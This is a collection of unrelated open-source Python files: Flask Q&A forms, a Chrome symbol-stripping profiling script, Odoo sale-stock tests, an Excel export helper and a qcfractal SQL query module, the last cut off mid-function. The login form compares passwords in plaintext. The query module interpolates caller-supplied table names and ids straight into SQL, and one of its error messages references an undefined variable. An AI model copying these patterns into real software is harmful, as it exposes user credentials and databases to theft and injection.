# ======================================================================
# repo: Murano/microqa | path: app/forms.py | license: MIT
# ======================================================================
# -*- coding: utf-8 -*-
from flask import flash
from flask_wtf import Form
from wtforms import StringField, TextAreaField, PasswordField, TextField
from model import User
from wtforms.validators import DataRequired, ValidationError
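# Translation gloss for the Russian UI strings below: "Заголовок вопроса" =
# "Question title", "Тело вопроса" = "Question body", "Тэги (через запятую)" =
# "Tags (comma-separated)", "Ответ" = "Answer", "Логин" = "Login", "Пароль" =
# "Password", "Неверное имя пользователя" = "Invalid username", "Неверный
# пароль" = "Wrong password", "Такой логин уже занят" = "That login is already
# taken", "Такой email адрес уже существует" = "That email address already exists".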
class QuestionForm(Form):
title = StringField(u"Заголовок вопроса", validators=[DataRequired()])
body = TextAreaField(u"Тело вопроса", validators=[DataRequired()])
tags = StringField(u"Тэги (через запятую)", validators=[DataRequired()])
class CommentForm(Form):
body = TextAreaField(u"Ответ", validators=[DataRequired()])
class LoginForm(Form):
username = StringField(u"Логин", validators=[DataRequired()])
password = PasswordField(u"Пароль", validators=[DataRequired()])
def validate_username(self, field):
user = self.get_user()
if user is None:
raise ValidationError(u'Неверное имя пользователя')
if user.password != self.password.data:
raise ValidationError(u'Неверный пароль')
def get_user(self):
return User.objects(username=self.username.data).first()
class RegistrationForm(Form):
username = TextField(u"Логин", validators=[DataRequired()])
email = TextField(u"E-mail", validators=[DataRequired()] ) # TODO: validate
password = PasswordField(u"Пароль", validators=[DataRequired()])
def validate_username(self, field):
if User.objects(username=self.username.data):
raise ValidationError(u'Такой логин уже занят')
def validate_email(self, field):
if User.objects(email=self.email.data):
raise ValidationError(u'Такой email адрес уже существует')

# ======================================================================
# repo: OSVR/UIforETWbins | path: bin/StripChromeSymbols.py | license: Apache-2.0
# ======================================================================
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This script exists to work around severe performance problems when WPA or other
Windows Performance Toolkit programs try to load the symbols for the Chrome
web browser. Some combination of the enormous size of the symbols or the
enhanced debug information generated by /Zo causes WPA to take about twenty
minutes to process the symbols for chrome.dll and chrome_child.dll. When
profiling Chrome this delay happens with every new set of symbols, so with
every new version of Chrome.
This script uses xperf actions to dump a list of the symbols referenced in
an ETW trace. If chrome.dll, chrome_child.dll, content.dll, or blink_web.dll are
detected and if decoded symbols are not found in %_NT_SYMCACHE_PATH% (default is
c:\symcache) then RetrieveSymbols.exe is used to download the symbols from the
Chromium symbol server, pdbcopy.exe is used to strip the private symbols, and
then another xperf action is used to load the stripped symbols, thus converting
them to .symcache files that can be efficiently loaded by WPA.
Locally built Chrome symbols are also supported.
More details on the discovery of this slowness and the evolution of the fix
can be found here:
https://randomascii.wordpress.com/2014/11/04/slow-symbol-loading-in-microsofts-profiler-take-two/
Discussion can be found here:
https://randomascii.wordpress.com/2013/03/09/symbols-the-microsoft-way/
Source code for RetrieveSymbols.exe can be found here:
https://github.com/google/UIforETW/tree/master/RetrieveSymbols
If "chromium-browser-symsrv" is not found in _NT_SYMBOL_PATH or RetrieveSymbols.exe
and pdbcopy.exe are not found then this script will exit early.
With the 10.0.14393 version of WPA the symbol translation problems have largely
been eliminated, which seems like it would make this script unnecessary, but the
symbol translation slowdowns have been replaced by a bug in downloading symbols from
Chrome's symbol server.
"""
from __future__ import print_function
import os
import sys
import re
import tempfile
import shutil
import subprocess
# Set to true to do symbol translation as well as downloading. Set to
# false to just download symbols and let WPA translate them.
strip_and_translate = True
def main():
if len(sys.argv) < 2:
print("Usage: %s trace.etl" % sys.argv[0])
sys.exit(0)
# Our usage of subprocess seems to require Python 2.7+
if sys.version_info.major == 2 and sys.version_info.minor < 7:
print("Your python version is too old - 2.7 or higher required.")
print("Python version is %s" % sys.version)
sys.exit(0)
symbol_path = os.environ.get("_NT_SYMBOL_PATH", "")
if symbol_path.count("chromium-browser-symsrv") == 0:
print("Chromium symbol server is not in _NT_SYMBOL_PATH. No symbol stripping needed.")
sys.exit(0)
script_dir = os.path.split(sys.argv[0])[0]
retrieve_path = os.path.join(script_dir, "RetrieveSymbols.exe")
pdbcopy_path = os.path.join(script_dir, "pdbcopy.exe")
if "programfiles(x86)" in os.environ:
# The UIforETW copy of pdbcopy.exe fails to copy some Chrome PDBs that the
# Windows 10 SDK version can copy - use it if present.
pdbcopy_install = os.path.join(os.environ["programfiles(x86)"], r"Windows kits\10\debuggers\x86\pdbcopy.exe")
if os.path.exists(pdbcopy_install):
pdbcopy_path = pdbcopy_install
# This tool converts PDBs created with /debug:fastlink (VC++ 2015 feature) to
# regular PDBs that contain all of the symbol information directly. This is
# required so that pdbcopy can copy the symbols.
un_fastlink_tool = r"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\amd64\mspdbcmf.exe"
if not os.path.exists(un_fastlink_tool):
un_fastlink_tool = None
# RetrieveSymbols.exe requires some support files. dbghelp.dll and symsrv.dll
# have to be in the same directory as RetrieveSymbols.exe and pdbcopy.exe must
# be in the path, so copy them all to the script directory.
for third_party in ["pdbcopy.exe", "dbghelp.dll", "symsrv.dll"]:
if not os.path.exists(third_party):
source = os.path.normpath(os.path.join(script_dir, r"..\third_party", \
third_party))
dest = os.path.normpath(os.path.join(script_dir, third_party))
shutil.copy2(source, dest)
if not os.path.exists(pdbcopy_path):
print("pdbcopy.exe not found. No symbol stripping is possible.")
sys.exit(0)
if not os.path.exists(retrieve_path):
print("RetrieveSymbols.exe not found. No symbol retrieval is possible.")
sys.exit(0)
tracename = sys.argv[1]
# Each symbol file that we pdbcopy gets copied to a separate directory so
# that we can support decoding symbols for multiple chrome versions without
# filename collisions.
tempdirs = []
# Typical output looks like:
# "[RSDS] PdbSig: {0e7712be-af06-4421-884b-496f833c8ec1}; Age: 33; Pdb: D:\src\chromium2\src\out\Release\initial\chrome.dll.pdb"
# Note that this output implies a .symcache filename like this:
# chrome.dll-0e7712beaf064421884b496f833c8ec121v2.symcache
# In particular, note that the xperf action prints the age in decimal, but the
# symcache names use the age in hexadecimal!
pdb_re = re.compile(r'"\[RSDS\] PdbSig: {(.*-.*-.*-.*-.*)}; Age: (.*); Pdb: (.*)"')
pdb_cached_re = re.compile(r"Found .*file - placed it in (.*)")
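# Worked example of the parsing above, using the sample output quoted in the
# comment: pdb_re yields guid = "0e7712be-af06-4421-884b-496f833c8ec1",
# age = "33", path = r"D:\src\chromium2\src\out\Release\initial\chrome.dll.pdb",
# and since the symcache name uses the age in hex (33 -> 21) the code below
# builds "chrome.dll-0e7712beaf064421884b496f833c8ec121v2.symcache".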
print("Pre-translating chrome symbols from stripped PDBs to avoid 10-15 minute translation times "
"and to work around WPA symbol download bugs.")
symcache_files = []
# Keep track of the local symbol files so that we can temporarily rename them
# to stop xperf from using -- rename them from .pdb to .pdbx
local_symbol_files = []
#-tle = tolerate lost events
#-tti = tolerate time inversions
#-a symcache = show image and symbol identification (see xperf -help processing)
#-dbgid = show symbol identification information (see xperf -help symcache)
command = 'xperf -i "%s" -tle -tti -a symcache -dbgid' % tracename
print("> %s" % command)
found_uncached = False
raw_command_output = subprocess.check_output(command, stderr=subprocess.STDOUT)
command_output = str(raw_command_output).splitlines()
for line in command_output:
dllMatch = None # This is the name to use when generating the .symcache files
if line.count("chrome_child.dll") > 0:
# The symcache files for chrome_child.dll use the name chrome.dll for some reason
dllMatch = "chrome.dll"
# Complete list of Chrome executables and binaries. Some are only used in internal builds.
# Note that case matters for downloading PDBs.
for dllName in ["chrome.exe", "chrome.dll", "blink_web.dll", "content.dll", "chrome_elf.dll", "chrome_watcher.dll", "libEGL.dll", "libGLESv2.dll"]:
if line.count("\\" + dllName) > 0:
dllMatch = dllName
if dllMatch:
match = pdb_re.match(line)
if match:
guid, age, path = match.groups()
guid = guid.replace("-", "")
age = int(age) # Prepare for printing as hex
filepart = os.path.split(path)[1]
symcache_file = r"c:\symcache\%s-%s%xv2.symcache" % (dllMatch, guid, age)
if os.path.exists(symcache_file):
#print("Symcache file %s already exists. Skipping." % symcache_file)
continue
# Only print messages for chrome PDBs that aren't in the symcache
found_uncached = True
print("Found uncached reference to %s: %s - %s" % (filepart, guid, age, ))
symcache_files.append(symcache_file)
pdb_cache_path = None
retrieve_command = "%s %s %s %s" % (retrieve_path, guid, age, filepart)
print(" > %s" % retrieve_command)
for subline in os.popen(retrieve_command):
cache_match = pdb_cached_re.match(subline.strip())
if cache_match:
pdb_cache_path = cache_match.groups()[0]
# RetrieveSymbols puts a period at the end of the output, so strip that.
if pdb_cache_path.endswith("."):
pdb_cache_path = pdb_cache_path[:-1]
if strip_and_translate and not pdb_cache_path:
# Look for locally built symbols
if os.path.exists(path):
pdb_cache_path = path
local_symbol_files.append(path)
if pdb_cache_path:
if strip_and_translate:
tempdir = tempfile.mkdtemp()
tempdirs.append(tempdir)
dest_path = os.path.join(tempdir, os.path.basename(pdb_cache_path))
print(" Copying PDB to %s" % dest_path)
# For some reason putting quotes around the command to be run causes
# it to fail. So don't do that.
copy_command = '%s "%s" "%s" -p' % (pdbcopy_path, pdb_cache_path, dest_path)
print(" > %s" % copy_command)
if un_fastlink_tool:
# If the un_fastlink_tool is available then run the pdbcopy command in a
# try block. If pdbcopy fails then run the un_fastlink_tool and try again.
try:
output = str(subprocess.check_output(copy_command, stderr=subprocess.STDOUT))
if output:
print(" %s" % output, end="")
except:
convert_command = '%s "%s"' % (un_fastlink_tool, pdb_cache_path)
print("Attempting to un-fastlink PDB so that pdbcopy can strip it. This may be slow.")
print(" > %s" % convert_command)
subprocess.check_output(convert_command)
output = str(subprocess.check_output(copy_command, stderr=subprocess.STDOUT))
if output:
print(" %s" % output, end="")
else:
output = str(subprocess.check_output(copy_command, stderr=subprocess.STDOUT))
if output:
print(" %s" % output, end="")
if not os.path.exists(dest_path):
print("Aborting symbol generation because stripped PDB '%s' does not exist. WPA symbol loading may be slow." % dest_path)
sys.exit(0)
else:
print(" Symbols retrieved.")
else:
print(" Failed to retrieve symbols.")
if tempdirs:
symbol_path = ";".join(tempdirs)
print("Stripped PDBs are in %s. Converting to symcache files now." % symbol_path)
os.environ["_NT_SYMBOL_PATH"] = symbol_path
# Create a list of to/from renamed tuples
renames = []
error = False
try:
rename_errors = False
for local_pdb in local_symbol_files:
temp_name = local_pdb + "x"
print("Renaming %s to %s to stop unstripped PDBs from being used." % (local_pdb, temp_name))
try:
# If the destination file exists we have to rename it or else the
# rename will fail.
if os.path.exists(temp_name):
os.remove(temp_name)
os.rename(local_pdb, temp_name)
except:
# Rename can and does throw exceptions. We must catch and continue.
e = sys.exc_info()[0]
print("Hit exception while renaming %s to %s. Continuing.\n%s" % (local_pdb, temp_name, e))
rename_errors = True
else:
renames.append((local_pdb, temp_name))
#-build = build the symcache store for this trace (see xperf -help symcache)
if rename_errors:
print("Skipping symbol generation due to PDB rename errors. WPA symbol loading may be slow.")
else:
gen_command = 'xperf -i "%s" -symbols -tle -tti -a symcache -build' % tracename
print("> %s" % gen_command)
for line in os.popen(gen_command).readlines():
pass # Don't print line
except KeyboardInterrupt:
# Catch Ctrl+C exception so that PDBs will get renamed back.
if renames:
print("Ctrl+C detected. Renaming PDBs back.")
error = True
for rename_names in renames:
try:
os.rename(rename_names[1], rename_names[0])
except:
# Rename can and does throw exceptions. We must catch and continue.
e = sys.exc_info()[0]
print("Hit exception while renaming %s back. Continuing.\n%s" % (rename_names[1], e))
for symcache_file in symcache_files:
if os.path.exists(symcache_file):
print("%s generated." % symcache_file)
else:
print("Error: %s not generated." % symcache_file)
error = True
# Delete the stripped PDB files
if error:
print("Retaining PDBs to allow rerunning xperf command-line.")
print("If re-running the command be sure to go:")
print("set _NT_SYMBOL_PATH=%s" % symbol_path)
else:
for directory in tempdirs:
shutil.rmtree(directory, ignore_errors=True)
elif strip_and_translate:
if found_uncached:
print("No PDBs copied, nothing to do.")
else:
print("No uncached PDBS found, nothing to do.")
if __name__ == "__main__":
main()
# ======================================================================
# repo: ChawalitK/odoo | path: addons/sale_stock/tests/test_sale_stock.py | license: GPL-3.0
# ======================================================================
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from openerp.addons.sale.tests.test_sale_common import TestSale
class TestSaleStock(TestSale):
def test_00_sale_stock_invoice(self):
"""
Test SO's changes when playing around with stock moves, quants, pack operations, pickings
and whatever other model there is in stock with "invoice on delivery" products
"""
inv_obj = self.env['account.invoice']
self.so = self.env['sale.order'].create({
'partner_id': self.partner.id,
'partner_invoice_id': self.partner.id,
'partner_shipping_id': self.partner.id,
'order_line': [(0, 0, {'name': p.name, 'product_id': p.id, 'product_uom_qty': 2, 'product_uom': p.uom_id.id, 'price_unit': p.list_price}) for (_, p) in self.products.iteritems()],
'pricelist_id': self.env.ref('product.list0').id,
'picking_policy': 'direct',
})
# confirm our standard so, check the picking
self.so.action_confirm()
self.assertTrue(self.so.picking_ids, 'Sale Stock: no picking created for "invoice on delivery" stockable products')
# invoice on order
self.so.action_invoice_create()
# deliver partially, check the so's invoice_status and delivered quantities
self.assertEqual(self.so.invoice_status, 'no', 'Sale Stock: so invoice_status should be "nothing to invoice" after invoicing')
pick = self.so.picking_ids
pick.force_assign()
pick.pack_operation_product_ids.write({'qty_done': 1})
wiz_act = pick.do_new_transfer()
wiz = self.env[wiz_act['res_model']].browse(wiz_act['res_id'])
wiz.process()
self.assertEqual(self.so.invoice_status, 'to invoice', 'Sale Stock: so invoice_status should be "to invoice" after partial delivery')
del_qties = [sol.qty_delivered for sol in self.so.order_line]
del_qties_truth = [1.0 if sol.product_id.type in ['product', 'consu'] else 0.0 for sol in self.so.order_line]
self.assertEqual(del_qties, del_qties_truth, 'Sale Stock: delivered quantities are wrong after partial delivery')
# invoice on delivery: only stockable products
inv_id = self.so.action_invoice_create()
inv_1 = inv_obj.browse(inv_id)
self.assertTrue(all([il.product_id.invoice_policy == 'delivery' for il in inv_1.invoice_line_ids]),
'Sale Stock: invoice should only contain "invoice on delivery" products')
# complete the delivery and check invoice_status again
self.assertEqual(self.so.invoice_status, 'no',
'Sale Stock: so invoice_status should be "nothing to invoice" after partial delivery and invoicing')
self.assertEqual(len(self.so.picking_ids), 2, 'Sale Stock: number of pickings should be 2')
pick_2 = self.so.picking_ids[0]
pick_2.force_assign()
pick_2.pack_operation_product_ids.write({'qty_done': 1})
self.assertIsNone(pick_2.do_new_transfer(), 'Sale Stock: second picking should be final without need for a backorder')
self.assertEqual(self.so.invoice_status, 'to invoice', 'Sale Stock: so invoice_status should be "to invoice" after complete delivery')
del_qties = [sol.qty_delivered for sol in self.so.order_line]
del_qties_truth = [2.0 if sol.product_id.type in ['product', 'consu'] else 0.0 for sol in self.so.order_line]
self.assertEqual(del_qties, del_qties_truth, 'Sale Stock: delivered quantities are wrong after complete delivery')
# Without timesheet, we manually set the delivered qty for the product serv_del
self.so.order_line[1]['qty_delivered'] = 2.0
inv_id = self.so.action_invoice_create()
self.assertEqual(self.so.invoice_status, 'invoiced',
'Sale Stock: so invoice_status should be "fully invoiced" after complete delivery and invoicing')
def test_01_sale_stock_order(self):
"""
Test SO's changes when playing around with stock moves, quants, pack operations, pickings
and whatever other model there is in stock with "invoice on order" products
"""
# let's cheat and put all our products to "invoice on order"
self.so = self.env['sale.order'].create({
'partner_id': self.partner.id,
'partner_invoice_id': self.partner.id,
'partner_shipping_id': self.partner.id,
'order_line': [(0, 0, {'name': p.name, 'product_id': p.id, 'product_uom_qty': 2, 'product_uom': p.uom_id.id, 'price_unit': p.list_price}) for (_, p) in self.products.iteritems()],
'pricelist_id': self.env.ref('product.list0').id,
'picking_policy': 'direct',
})
for sol in self.so.order_line:
sol.product_id.invoice_policy = 'order'
# confirm our standard so, check the picking
self.so.action_confirm()
self.assertTrue(self.so.picking_ids, 'Sale Stock: no picking created for "invoice on order" stockable products')
# let's do an invoice for a deposit of 5%
adv_wiz = self.env['sale.advance.payment.inv'].with_context(active_ids=[self.so.id]).create({
'advance_payment_method': 'percentage',
'amount': 5.0,
'product_id': self.env.ref('sale.advance_product_0').id,
})
act = adv_wiz.with_context(open_invoices=True).create_invoices()
inv = self.env['account.invoice'].browse(act['res_id'])
self.assertEqual(inv.amount_untaxed, self.so.amount_untaxed * 5.0 / 100.0, 'Sale Stock: deposit invoice is wrong')
self.assertEqual(self.so.invoice_status, 'to invoice', 'Sale Stock: so should be to invoice after invoicing deposit')
# invoice on order: everything should be invoiced
self.so.action_invoice_create(final=True)
self.assertEqual(self.so.invoice_status, 'invoiced', 'Sale Stock: so should be fully invoiced after second invoice')
# deliver, check the delivered quantities
pick = self.so.picking_ids
pick.force_assign()
pick.pack_operation_product_ids.write({'qty_done': 2})
self.assertIsNone(pick.do_new_transfer(), 'Sale Stock: complete delivery should not need a backorder')
del_qties = [sol.qty_delivered for sol in self.so.order_line]
del_qties_truth = [2.0 if sol.product_id.type in ['product', 'consu'] else 0.0 for sol in self.so.order_line]
self.assertEqual(del_qties, del_qties_truth, 'Sale Stock: delivered quantities are wrong after partial delivery')
# invoice on delivery: nothing to invoice
self.assertFalse(self.so.action_invoice_create(), 'Sale Stock: there should be nothing to invoice')
def test_02_sale_stock_return(self):
"""
Test a SO with a product invoiced on delivery. Deliver and invoice the SO, then do a return
of the picking. Check that a refund invoice is well generated.
"""
# initial SO
self.partner = self.env.ref('base.res_partner_1')
self.product = self.env.ref('product.product_delivery_01')
so_vals = {
'partner_id': self.partner.id,
'partner_invoice_id': self.partner.id,
'partner_shipping_id': self.partner.id,
'order_line': [(0, 0, {
'name': self.product.name,
'product_id': self.product.id,
'product_uom_qty': 5.0,
'product_uom': self.product.uom_id.id,
'price_unit': self.product.list_price})],
'pricelist_id': self.env.ref('product.list0').id,
}
self.so = self.env['sale.order'].create(so_vals)
# confirm our standard so, check the picking
self.so.action_confirm()
self.assertTrue(self.so.picking_ids, 'Sale Stock: no picking created for "invoice on delivery" stockable products')
# invoice in on delivery, nothing should be invoiced
self.assertEqual(self.so.invoice_status, 'no', 'Sale Stock: so invoice_status should be "no" instead of "%s".' % self.so.invoice_status)
# deliver completely
pick = self.so.picking_ids
pick.force_assign()
pick.pack_operation_product_ids.write({'qty_done': 5})
pick.do_new_transfer()
# Check quantity delivered
del_qty = sum(sol.qty_delivered for sol in self.so.order_line)
self.assertEqual(del_qty, 5.0, 'Sale Stock: delivered quantity should be 5.0 instead of %s after complete delivery' % del_qty)
# Check invoice
self.assertEqual(self.so.invoice_status, 'to invoice', 'Sale Stock: so invoice_status should be "to invoice" instead of "%s" before invoicing' % self.so.invoice_status)
inv_1_id = self.so.action_invoice_create()
self.assertEqual(self.so.invoice_status, 'invoiced', 'Sale Stock: so invoice_status should be "invoiced" instead of "%s" after invoicing' % self.so.invoice_status)
self.assertEqual(len(inv_1_id), 1, 'Sale Stock: only one invoice instead of "%s" should be created' % len(inv_1_id))
self.inv_1 = self.env['account.invoice'].browse(inv_1_id)
self.assertEqual(self.inv_1.amount_untaxed, self.so.amount_untaxed, 'Sale Stock: amount in SO and invoice should be the same')
self.inv_1.signal_workflow('invoice_open')
# Create return picking
StockReturnPicking = self.env['stock.return.picking']
default_data = StockReturnPicking.with_context(active_ids=pick.ids, active_id=pick.ids[0]).default_get(['move_dest_exists', 'original_location_id', 'product_return_moves', 'parent_location_id', 'location_id'])
return_wiz = StockReturnPicking.with_context(active_ids=pick.ids, active_id=pick.ids[0]).create(default_data)
return_wiz.product_return_moves.quantity = 2.0 # Return only 2
return_wiz.product_return_moves.to_refund_so = True # Refund these 2
res = return_wiz.create_returns()
return_pick = self.env['stock.picking'].browse(res['res_id'])
# Validate picking
return_pick.force_assign()
return_pick.pack_operation_product_ids.write({'qty_done': 2})
return_pick.do_new_transfer()
# Check invoice
self.assertEqual(self.so.invoice_status, 'to invoice', 'Sale Stock: so invoice_status should be "to invoice" instead of "%s" after picking return' % self.so.invoice_status)
self.assertEqual(self.so.order_line[0].qty_delivered, 3.0, 'Sale Stock: delivered quantity should be 3.0 instead of "%s" after picking return' % self.so.order_line[0].qty_delivered)
# let's do an invoice with refunds
adv_wiz = self.env['sale.advance.payment.inv'].with_context(active_ids=[self.so.id]).create({
'advance_payment_method': 'all',
})
adv_wiz.with_context(open_invoices=True).create_invoices()
self.inv_2 = self.so.invoice_ids.filtered(lambda r: r.state == 'draft')
self.assertEqual(self.inv_2.invoice_line_ids[0].quantity, 2.0, 'Sale Stock: refund quantity on the invoice should be 2.0 instead of "%s".' % self.inv_2.invoice_line_ids[0].quantity)
self.assertEqual(self.so.invoice_status, 'no', 'Sale Stock: so invoice_status should be "no" instead of "%s" after invoicing the return' % self.so.invoice_status)
def test_03_sale_stock_delivery_partial(self):
"""
Test a SO with a product invoiced on delivery. Deliver partially and invoice the SO, when
the SO is set on 'done', the SO should be fully invoiced.
"""
# initial SO
self.partner = self.env.ref('base.res_partner_1')
self.product = self.env.ref('product.product_delivery_01')
so_vals = {
'partner_id': self.partner.id,
'partner_invoice_id': self.partner.id,
'partner_shipping_id': self.partner.id,
'order_line': [(0, 0, {
'name': self.product.name,
'product_id': self.product.id,
'product_uom_qty': 5.0,
'product_uom': self.product.uom_id.id,
'price_unit': self.product.list_price})],
'pricelist_id': self.env.ref('product.list0').id,
}
self.so = self.env['sale.order'].create(so_vals)
# confirm our standard so, check the picking
self.so.action_confirm()
self.assertTrue(self.so.picking_ids, 'Sale Stock: no picking created for "invoice on delivery" stockable products')
# invoice in on delivery, nothing should be invoiced
self.assertEqual(self.so.invoice_status, 'no', 'Sale Stock: so invoice_status should be "nothing to invoice"')
# deliver partially
pick = self.so.picking_ids
pick.force_assign()
pick.pack_operation_product_ids.write({'qty_done': 4})
backorder_wiz_id = pick.do_new_transfer()['res_id']
backorder_wiz = self.env['stock.backorder.confirmation'].browse([backorder_wiz_id])
backorder_wiz.process_cancel_backorder()
# Check quantity delivered
del_qty = sum(sol.qty_delivered for sol in self.so.order_line)
self.assertEqual(del_qty, 4.0, 'Sale Stock: delivered quantity should be 4.0 after partial delivery')
# Check invoice
self.assertEqual(self.so.invoice_status, 'to invoice', 'Sale Stock: so invoice_status should be "to invoice" before invoicing')
inv_1_id = self.so.action_invoice_create()
self.assertEqual(self.so.invoice_status, 'no', 'Sale Stock: so invoice_status should be "no" after invoicing')
self.assertEqual(len(inv_1_id), 1, 'Sale Stock: only one invoice should be created')
self.inv_1 = self.env['account.invoice'].browse(inv_1_id)
self.assertEqual(self.inv_1.amount_untaxed, self.so.amount_untaxed, 'Sale Stock: amount in SO and invoice should be the same')
self.so.action_done()
self.assertEqual(self.so.invoice_status, 'invoiced', 'Sale Stock: so invoice_status should be "invoiced" when set to done')
# ======================================================================
# repo: Loreton/MP3Catalog | path: Source/Project/ExcelDB/ExcelCatalog.py | license: Unlicense
# ======================================================================
#!/usr/bin/python
# -*- coding: iso-8859-1 -*-
#
# Scope: Program for ...........
# by Loreto Notarantonio 2013, February
# ######################################################################################
import os, sys
import ast
################################################################################
# - M A I N
# - Includes:
# - 2 - Input parameter validation
# - 5 - Call to the project's main program
################################################################################
def ReadExcelDB(gv, xlsFile, rangeToProcess):
logger = gv.Ln.SetLogger(package=__name__)
C = gv.Ln.LnColor()
csvFileInput = xlsFile.rsplit('.', -1)[0] + '.csv'
logger.debug('XLS file name: {0}'.format(xlsFile))
logger.debug('CSV file name: {0}'.format(csvFileInput))
# - If the CSV is older than the XLS, perform the export
if gv.Ln.Fmtime(xlsFile) > gv.Ln.Fmtime(csvFileInput):
msg = 'Range to process: {0}'.format(rangeToProcess)
logger.debug(msg); print(msg)
mydata = gv.Ln.Excel(xlsFile)
mydata.exportCSV('Catalog', outFname=csvFileInput, rangeString=rangeToProcess, colNames=4, fPRINT=True)
else:
msg = 'excel file is older than CSV file. No export will take place.'
logger.debug(msg); print(msg)
return csvFileInput
# ======================================================================
# repo: psi4/mongo_qcdb | path: qcfractal/storage_sockets/db_queries.py | license: BSD-3-Clause
# ======================================================================
from typing import List, Optional, Set, Union
from sqlalchemy import Integer, inspect
from sqlalchemy.sql import bindparam, text
from qcfractal.interface.models import Molecule, ResultRecord
from qcfractal.storage_sockets.models import MoleculeORM, ResultORM
QUERY_CLASSES = set()
class QueryBase:
# The name/alias used by the REST APIs to access this class
_class_name = None
_available_groupby = set()
# Mapping of the requested feature and the internal query method
_query_method_map = {}
def __init__(self, database_name, max_limit=1000):
self.database_name = database_name
self.max_limit = max_limit
def __init_subclass__(cls, **kwargs):
if cls not in QUERY_CLASSES:
QUERY_CLASSES.add(cls)
super().__init_subclass__(**kwargs)
def query(self, session, query_key, limit=0, skip=0, include=None, exclude=None, **kwargs):
if query_key not in self._query_method_map:
raise TypeError(f"Query type {query_key} is unimplemented for class {self._class_name}")
self.session = session
return getattr(self, self._query_method_map[query_key])(**kwargs)
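# Dispatch sketch (hypothetical database name, mapping as defined by each
# subclass): TaskQueries("qcf_db").query(session, "counts") looks "counts" up
# in _query_method_map and invokes self._task_counts(**kwargs).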
def execute_query(self, sql_statement, with_keys=True, **kwargs):
"""Execute sql statemet, apply limit, and return results as dict if needed"""
# TODO: check count first, way to iterate
# sql_statement += f' LIMIT {self.max_limit}'
result = self.session.execute(sql_statement, kwargs)
keys = result.keys() # get keys before fetching
result = result.fetchall()
self.session.commit()
# create a list of dict with the keys and values of the results (instead of tuples)
if with_keys:
result = [dict(zip(keys, res)) for res in result]
return result
def _base_count(self, table_name: str, available_groupbys: Set[str], groupby: Optional[List[str]] = None):
if groupby:
bad_groups = set(groupby) - available_groupbys
if bad_groups:
raise AttributeError(f"The following groups are not permissible: {missing}")
global_str = ", ".join(groupby)
select_str = global_str + ", "
extra_str = f"""GROUP BY {global_str}\nORDER BY {global_str}"""
else:
select_str = ""
extra_str = ""
sql_statement = f"""
select {select_str}count(*) from {table_name}
{extra_str}
"""
ret = self.execute_query(sql_statement, with_keys=True)
if groupby:
return ret
else:
return ret[0]["count"]
@classmethod
def _raise_missing_attribute(cls, query_key, missing_attribute, amend_msg=""):
"""Raises error for missing attribute in a message suitable for the REST user"""
raise AttributeError(f"To query {cls._class_name} for {query_key} " f"you must provide {missing_attribute}.")
# ----------------------------------------------------------------------------
class TaskQueries(QueryBase):
_class_name = "task"
_query_method_map = {"counts": "_task_counts"}
def _task_counts(self):
sql_statement = f"""
SELECT tag, priority, status, count(*)
FROM task_queue
WHERE True
group by tag, priority, status
order by tag, priority, status
"""
return self.execute_query(sql_statement, with_keys=True)
# ----------------------------------------------------------------------------
class DatabaseStatQueries(QueryBase):
_class_name = "database_stats"
_query_method_map = {
"table_count": "_table_count",
"database_size": "_database_size",
"table_information": "_table_information",
}
def _table_count(self, table_name=None):
if table_name is None:
self._raise_missing_attribute("table_name", "table name")
sql_statement = f"SELECT count(*) from {table_name}"
return self.execute_query(sql_statement, with_keys=False)[0]
def _database_size(self):
sql_statement = f"SELECT pg_database_size('{self.database_name}')"
return self.execute_query(sql_statement, with_keys=True)[0]["pg_database_size"]
def _table_information(self):
sql_statement = f"""
SELECT relname AS table_name
, c.reltuples::BIGINT AS row_estimate
, pg_total_relation_size(c.oid) AS total_bytes
, pg_indexes_size(c.oid) AS index_bytes
, pg_total_relation_size(reltoastrelid) AS toast_bytes
FROM pg_class c
LEFT JOIN pg_namespace n ON n.oid = c.relnamespace
WHERE relkind = 'r';
"""
result = self.execute_query(sql_statement, with_keys=False)
ret = []
for row in result:
if ("pg_" in row[0]) or ("sql_" in row[0]):
continue
ret.append(list(row))
ret = {"columns": ["table_name", "row_estimate", "total_bytes", "index_bytes", "toast_bytes"], "rows": ret}
return ret
class ResultQueries(QueryBase):
_class_name = "result"
_query_method_map = {"count": "_count"}
def _count(self, groupby: Optional[List[str]] = None):
available_groupbys = {"result_type", "status"}
return self._base_count("base_result", available_groupbys, groupby=groupby)
class MoleculeQueries(QueryBase):
_class_name = "molecule"
_query_method_map = {"count": "_count"}
def _count(self, groupby: Optional[List[str]] = None):
available_groupbys = set()
return self._base_count("molecule", available_groupbys, groupby=groupby)
# ----------------------------------------------------------------------------
class TorsionDriveQueries(QueryBase):
_class_name = "torsiondrive"
_query_method_map = {
"initial_molecules": "_get_initial_molecules",
"initial_molecules_ids": "_get_initial_molecules_ids",
"final_molecules": "_get_final_molecules",
"final_molecules_ids": "_get_final_molecules_ids",
"return_results": "_get_return_results",
}
def _get_initial_molecules_ids(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("initial_molecules_ids", "torsion drive id")
sql_statement = f"""
select initial_molecule from optimization_procedure as opt where opt.id in
(
select opt_id from optimization_history where torsion_id = {torsion_id}
)
order by opt.id
"""
return self.execute_query(sql_statement, with_keys=False)
def _get_initial_molecules(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("initial_molecules", "torsion drive id")
sql_statement = f"""
select molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.initial_molecule
where opt.id in
(select opt_id from optimization_history where torsion_id = {torsion_id})
"""
return self.execute_query(sql_statement, with_keys=True)
def _get_final_molecules_ids(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("final_molecules_ids", "torsion drive id")
sql_statement = f"""
select final_molecule from optimization_procedure as opt where opt.id in
(
select opt_id from optimization_history where torsion_id = {torsion_id}
)
order by opt.id
"""
return self.execute_query(sql_statement, with_keys=False)
def _get_final_molecules(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("final_molecules", "torsion drive id")
sql_statement = f"""
select molecule.* from molecule
join optimization_procedure as opt
